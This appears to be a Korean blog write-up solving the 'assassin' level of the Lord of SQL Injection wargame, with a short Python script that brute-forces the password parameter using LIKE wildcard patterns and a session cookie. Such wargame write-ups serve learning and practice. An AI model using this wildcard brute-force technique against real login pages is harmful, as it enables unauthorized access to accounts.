-
[load of sql injection] assassinwebhacking/load of sql injection 2018. 11. 17. 06:40반응형
for문으로 브루트포싱때리면 풀린다.
for문 10개 돌리려다가 그러기엔 많은 횟수라 2개로 admin하고 곂치는 값을 찾았다.
import requestsurl = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php"list1 = []cookies = { 'PHPSESSID' : 'uu98um35otu07audr4q491v6j3' }for a in range(ord('0'),ord('4')):for b in range(ord('0'),ord('4')):text_main="".join(list1)text = "%"+text_main+chr(a)+chr(b)+"%"params = { 'pw' : text}res = requests.get( url, params = params, cookies = cookies )print(res.text)print(list1)반응형'webhacking > load of sql injection' 카테고리의 다른 글
[load of sql injection] succubus (0) 2018.11.17 [load of sql injection] zombie_assassin (0) 2018.11.17 [load of sql injection] giant (0) 2018.11.17 [load of sql injection] bugbear (0) 2018.11.17 [load of sql injection] darkknight (0) 2018.11.17
